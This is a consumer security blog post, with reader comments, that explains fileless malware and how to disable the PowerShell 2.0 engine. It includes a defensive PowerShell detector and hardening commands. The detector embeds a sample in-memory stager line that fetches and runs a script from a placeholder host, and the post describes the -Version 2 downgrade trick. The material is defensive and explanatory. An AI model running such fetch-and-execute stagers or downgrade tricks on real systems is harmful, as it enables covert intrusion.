Are You Vulnerable to Fileless Malware?

Category: Security

A clever (but insidious) software technique that's been around for over a decade has found new favor among today's malware authors, complicating the work of anti-malware developers and forensic analysts. Tracking down so-called “fileless malware” is to detecting regular malware what ghost-hunting is to catching a garden-variety burglar. Read on to learn about this resurgent threat and what you can do to stop it…

What is Fileless Malware?

Traditional malware consists of one or more files stored on a hard disk. At least one of these files must be executable, and the malware cannot do any harm until that file is executed. Fileless malware, in contrast, runs only in memory and is never written to your hard drive as a conventional executable. In between sits semi-fileless malware: a harmless-looking launcher (a document macro, a shortcut, a scheduled task, or a registry value holding an encoded script) is written to disk, while the working payload is fetched from a remote server or decoded straight into memory.

Files leave traces as they are written to and read from disk. A file is a fixed sequence of bytes that can be hashed or reduced to a static signature and compared against the signatures in an antivirus database, and its path, timestamps and digital signature all help an analyst work out where a file-based malware package came from and what it is.

Instead of tricking the user into downloading and running an executable file, fileless malware abuses legitimate, trusted tools that ship with the operating system (PowerShell, Windows Management Instrumentation, mshta.exe, rundll32.exe and the like, a practice often called “living off the land”) to do its dirty work. That means there are no “suspicious” programs on the hard drive, and the processes active in memory are signed Microsoft binaries. Only what those trusted processes are being made to do gives away the “ghost” lurking in system memory.

Fileless Malware - The Threat

Fileless malware is fluid. Its code lives inside the memory of whatever trusted process it has hijacked, can be re-created on every boot from an encoded string stashed in the registry or a WMI event subscription, and has no file for a scanner to hash. Traditional antivirus software therefore looks in vain for the wrong thing – a signature – and in the wrong place – the hard disk – and never sees the payload at all.

Effective anti-malware hunts the shapeshifting ghost by its behavior rather than its appearance. It watches what each process does: which child processes it spawns, which memory regions it suddenly marks executable, and where it sends data on the network. On Windows 10, the Antimalware Scan Interface (AMSI) also hands the decoded text of every PowerShell script block to the installed antivirus engine just before it runs, so an encoded or obfuscated script is inspected in memory even though it never touched the disk. Having identified the outline of a ghost, the anti-malware zeroes in on that outline to monitor what crosses it. What the ghost does becomes the important thing, not what it is.

Does a Word document suddenly launch PowerShell with a hidden window and an encoded command? That launch can be blocked until the reason for it has been discovered and authorized. Does the ghost send data out to the Internet? To whom and why must be known before that is allowed. All of this deciding and blocking must happen in real time, before the suspicious action completes, so effective anti-malware has to sit inside the running system, hooking process creation, script execution and network calls, rather than scanning files after the fact. That requirement constrains how much inspection the ghost-hunter can afford to do, and how much it slows the overall system.
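The kind of behavioral check described above, written out as an added example (this is not code from the article, Malwarebytes or any vendor). It looks at the command line a process was started with, expands a `-EncodedCommand` payload so the real script text is visible, and flags the launch patterns that fileless stagers rely on. The sample command lines are constructed for the demo, and the `example.invalid` host is a reserved name that resolves nowhere; the function name is this example's own.

```powershell
# Added example (not from the article): a behavioural check over process command lines,
# the sort of thing AMSI-aware anti-malware and EDR products do in real time.

function Test-SuspiciousPowerShellCommandLine {
    param([Parameter(Mandatory)][string]$CommandLine)

    $reasons = @()
    $text = $CommandLine

    # Expand -EncodedCommand (PowerShell also accepts -e, -ec and -enc) so the keyword
    # checks below see the real script. The payload is Base64 of UTF-16LE text.
    if ($CommandLine -match '-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)') {
        try {
            $decoded = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[1]))
            $reasons += "encoded command, decodes to: $decoded"
            $text += ' ' + $decoded
        } catch {
            $reasons += 'encoded command present but not valid Base64'
        }
    }

    # Asking for the 2.0 engine sidesteps AMSI and script block logging (downgrade attack)
    if ($CommandLine -match '-(?:v|version)\s+2\b') {
        $reasons += 'requests PowerShell 2.0 engine (no AMSI, no script block logging)'
    }
    if ($CommandLine -match '-(?:w|windowstyle)\s+hidden') { $reasons += 'hidden window' }

    # Classic in-memory stager: fetch text over the network and evaluate it without saving a file
    if ($text -match '\b(IEX|Invoke-Expression)\b') { $reasons += 'Invoke-Expression' }
    if ($text -match 'DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient') { $reasons += 'network download' }
    if ($text -match 'FromBase64String') { $reasons += 'in-script Base64 decoding' }

    # -ExecutionPolicy Bypass is deliberately not flagged on its own: plenty of legitimate
    # scheduled tasks use it, and it says nothing about what the script actually does.
    [pscustomobject]@{
        Suspicious  = ($reasons.Count -gt 0)
        Reasons     = $reasons
        CommandLine = $CommandLine
    }
}

# Constructed samples. The first has the stager shape discussed in the article, encoded the
# way scripts are really passed on the command line; the second is a benign admin task;
# the third is a downgrade request.
$stager  = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')"
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($stager))
$samples = @(
    "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand $encoded",
    "powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\nightly-backup.ps1",
    "powershell.exe -Version 2 -NoProfile -Command Get-Date"
)

$samples | ForEach-Object { Test-SuspiciousPowerShellCommandLine -CommandLine $_ } | Format-List

# Live use (assumption: "Audit Process Creation" with command-line logging is enabled, so
# Security event 4688 carries a "Process Command Line" field):
# Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688 } -MaxEvents 1000 |
#     ForEach-Object { if ($_.Message -match 'Process Command Line:\s*(.+)') { $Matches[1].Trim() } } |
#     Where-Object { $_ -match 'powershell' } |
#     ForEach-Object { Test-SuspiciousPowerShellCommandLine -CommandLine $_ } |
#     Where-Object Suspicious
```

The first and third samples come back flagged (the first with the decoded stager text in its reasons), the backup task does not. Real products weigh many more signals than this, and weigh them in combination; the point of the example is that decoding the command and judging the behavior is what catches a payload that never exists as a file.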

Digging Deeper

Fileless malware poses many other challenges for the good guys. I hope these examples give you some appreciation for the prowess of anti-malware developers who keep us safe from much of this nasty stuff, if not all of it. MalwareBytes’ Vasilios Hioureas covers fileless malware in excruciating geekly detail in an ongoing series of articles that begins here.

To be honest, even after reading these highly technical articles, I was still a bit confused about exactly how fileless malware actually sneaks into a computer. Suffice it to say that under the right conditions, some combination of unpatched vulnerabilities, a zero-day exploit, a compromised website, a careless click on an email link, an infected document or USB drive can result in a fileless malware attack. Malicious instructions are then handed to a legitimate program, most often PowerShell, which carries out the attack. A typical chain is a document macro or shortcut that launches powershell.exe with a hidden window and a Base64-encoded command; that command downloads the real payload into memory and runs it with Invoke-Expression, never saving it as a file.

Traditional anti-virus programs that rely only on file-based scanning will not stop these attacks. Avast, Avira and Bitdefender do claim to protect against this threat, but I had to dig deep to find it on their websites. MalwareBytes has done a lot of research on this type of malware and seems to understand mitigation strategies well.

PC-Matic also differentiates itself by focusing on emerging polymorphic threats and fileless ransomware detection. If you missed it, see my review: PC Matic 4.0 – My Review.

It's important to keep yourself aware of emerging threats and take action where you can to protect yourself, your computer, and your important data. Keeping your operating system, application software and anti-malware defenses updated is an important first step. And since many of these fileless malware attacks rely on PowerShell, removing the old PowerShell 2.0 engine may help as well. The steps below disable only that deprecated engine, not the current Windows PowerShell 5.x that Windows itself depends on, and that is the right target: the 2.0 engine predates AMSI and script block logging, so an attacker who runs PowerShell with “-Version 2” gets a copy that the antivirus cannot see into. Removing it closes that “downgrade” path. To do so, follow these steps:

  • Type windows features in the Windows 10 search box, and press ENTER (this opens the “Turn Windows features on or off” dialog).
  • Scroll down to the Windows PowerShell 2.0 line item.
  • Uncheck the box next to it, and click OK.
  • Restart your computer if prompted to do so.
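The same change from an elevated Windows PowerShell prompt, with the before-and-after checks a practitioner would run, as an added example (not code from the article). The optional-feature names, the script block logging registry key and the “-Version 2” behavior are the real Microsoft ones; the function names are this example's own. It assumes Windows 10 with Windows PowerShell 5.1.

```powershell
#Requires -RunAsAdministrator
# Added example (not from the article): command-line equivalent of the Windows Features
# steps, plus verification. Run in an elevated Windows PowerShell 5.1 prompt on Windows 10.

function Get-PowerShellV2State {
    # The parent feature ("Windows PowerShell 2.0" in the dialog) and its engine child
    Get-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root, MicrosoftWindowsPowerShellV2 |
        Select-Object FeatureName, State
}

function Disable-PowerShellV2 {
    # Same effect as unchecking "Windows PowerShell 2.0"; -NoRestart suppresses the reboot
    # prompt. A restart may still be needed before the change is fully effective.
    Disable-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root -NoRestart | Out-Null
}

function Enable-ScriptBlockLogging {
    # Makes PowerShell 5.x write the decoded text of every script block it runs to the
    # Microsoft-Windows-PowerShell/Operational log (Event ID 4104), -EncodedCommand payloads included
    $key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    Set-ItemProperty -Path $key -Name EnableScriptBlockLogging -Value 1 -Type DWord
}

function Test-PowerShellDowngrade {
    # Ask for the 2.0 engine explicitly, the way a downgrade attack does. It answers "2" only
    # if the engine (and the .NET 2.0/3.5 runtime it needs) is still present; otherwise
    # powershell.exe reports that the required .NET Framework version is not installed.
    $out = & powershell.exe -NoProfile -Version 2 -Command '$PSVersionTable.PSVersion.Major' 2>&1
    if ($out -match '^2$') { 'PowerShell 2.0 engine still available: downgrade possible' }
    else                   { 'PowerShell 2.0 engine unavailable: downgrade blocked' }
}

'Before:'; Get-PowerShellV2State; Test-PowerShellDowngrade
Disable-PowerShellV2
Enable-ScriptBlockLogging
'After:';  Get-PowerShellV2State; Test-PowerShellDowngrade
```

Do not go further and remove or block PowerShell 5.x itself: Windows Update, Defender and many management tools depend on it, and a blocked powershell.exe does nothing about the same code being run through WMI or other trusted binaries. Logging every script block, keeping the 2.0 engine off, and running an AMSI-aware anti-malware product gives you visibility into what PowerShell is actually doing, which is the thing that catches fileless attacks.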

Have you been affected by fileless malware, or has your security tool detected one? Your thoughts on this topic are welcome. Post your comment or question below…

This article was posted by on 22 Jun 2021

Most recent comments on "Are You Vulnerable to Fileless Malware?"

Posted by:

Ken H
22 Jun 2021

Bob, you (or someone else) must have already told me to disable Power Shell 2.0 because it was not checked when I checked just now.


Posted by:

Brian B
22 Jun 2021

From Eset's web site:-

"Moreover, some new malicious code now operates "in-memory only," without needing persistent components in the file system that can be detected conventionally. Only memory scanning technology, such as ESET Advanced Memory Scanner, can discover these attacks."

I'm sure others also protect just as well.


Posted by:

Henry B.
23 Jun 2021

Bob, thanks as always. I disabled PowerShell on both of our machines. 😊


Posted by:

Cory McIntyre
23 Jun 2021

When I type "Windows Power Shell 2.0" or any other search with Windows Power Shell I don't find anything that allows me to check or uncheck a box. I am taken to a command prompt. I am running Windows 10, version 2004.


Posted by:

Brian B
23 Jun 2021

Cory, Try typing "Type windows features in the Windows 10 search box, and press ENTER."

Rather than turn off PowerShell, I just made sure my AV application detects and wipes fileless malware.


Posted by:

Wild Bill
23 Jun 2021

@Cory - Type Windows Features to access the Control Panel for windows features and then scroll down to Windows PowerShell. It would appear that after some point in 2019 Windows PowerShell is not enabled by default (no box checked), if your installation is up to date.


Posted by:

Boneman
23 Jun 2021

@Cory McIntyre

Try typing "Windows Features" for Windows 10, and continue from there.


Posted by:

John
23 Jun 2021

I typed windows etc in the search box and unticked
Scanned with Avg, nothing found and restarted.


Posted by:

Dave
23 Jun 2021

This is what came up when I typed windows feature in the run box:
"Windows cannot find 'windows'. Make sure you typed the name correctly, and then try again".


Posted by:

Diane
23 Jun 2021

I have malwarebytes installed on my 2020 MacBook Air. Does any of this apply to me?


Posted by:

Frances
23 Jun 2021

What about Windows 7 users?


Posted by:

John
23 Jun 2021

I followed the instructions (although they were slightly different than what Bob said they would be), unchecked P.S.2.0. Did not have to restart, although I did so manually. Now I do not have a Windows Search Box. How do I get that back? (Version 20H2).


Posted by:

RandiO
24 Jun 2021

"Do keep in mind that [this is] only disabling the deprecated PowerShell [version] 2.0 [only] but the regular PowerShell [and ISE] is still enabled. In fact, you can access [both] as you would normally."
From
"3 Ways to Disable PowerShell on Windows 10[...] including PowerShell 7.
• How to block PowerShell access using Group Policy
• How to block PowerShell access using Security Policy
• How to block PowerShell 7 access uninstalling app
If you are trying to prevent users from making unwanted system changes, in addition to restricting access to [disabling or uninstalling] PowerShell, you can also disable Command Prompt, Task Manager, and Registry. Furthermore, you can even try switching the account type to "Standard User" to prevent users from making system changes and make the account more secure. However, users will still have access to PowerShell, Command Prompt, and Task Manager to perform some common tasks."
From


Posted by:

RandiO
24 Jun 2021

carets are a no-no and links get stripped:
https://windowsloop.com/disable-powershell-v2/
https://www.windowscentral.com/how-disable-powershell-windows-10


Posted by:

Willard M.
30 Jun 2021

Oh, great! Another computer safety issue I have to deal with. All the time I [should] have saved as a result of the wonderful personal computer, gets chewed up protecting my [computer] safety.

At some point I will be spending more free time futzing with computer maintenance/safety than actually utilizing my computer.


Posted by:

Bruce
05 Jul 2021

Doesn't RAM empty when a computer is turned off?



Copyright © 2005 - Bob Rankin - All Rights Reserved
Article information: AskBobRankin -- Are You Vulnerable to Fileless Malware? (Posted: 22 Jun 2021)
Source: https://askbobrankin.com/are_you_vulnerable_to_fileless_malware.html